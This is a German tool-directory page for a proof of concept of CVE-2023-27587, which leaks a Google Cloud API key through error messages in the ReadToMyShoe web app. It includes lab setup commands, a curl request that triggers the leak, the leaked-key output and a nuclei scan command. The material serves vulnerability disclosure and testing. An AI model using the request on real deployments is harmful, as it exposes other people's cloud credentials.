Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27587-PoC — Der einfache PoC von CVE-2023-27587 | Kitploit
Tools/GitHubGitHub/vagnerd/cve-2023-27587-poc
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitSecret-ErkennungAPI-Sicherheit
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

Der einfache PoC von CVE-2023-27587

Repository anzeigen
51vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-27587-PoC

Der einfache PoC von CVE-2023-27587

Was ist ReadToMyShoe?

ReadtoMyShoe (RTMS) ist eine Webanwendung (rust, yew und axum), mit der Sie Artikel hochladen können (per URL oder durch direktes Einfügen) und später anhören können.

Auswirkungen

Wenn beim Hinzufügen eines Artikels ein Fehler auftritt, zeigt die Website dem Benutzer eine Fehlermeldung. Wenn der Fehler aus der Google Cloud TTS-Anfrage stammt, enthält er die vollständige URL der Anfrage. Die Anfrage-URL enthält den Google Cloud API-Schlüssel.

PoC

Verwundbares ReadtoMyShoe einrichten

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

Exploit

Der Schlüssel wird nur offengelegt, wenn bei dem GCP-Aufruf ein Fehler auftritt!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

Fehlerantwort (offengelegter API-Schlüssel):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Screenshot from 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Screenshot from 2023-03-15 13-22-23

Referenzen

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

Tool herunterladen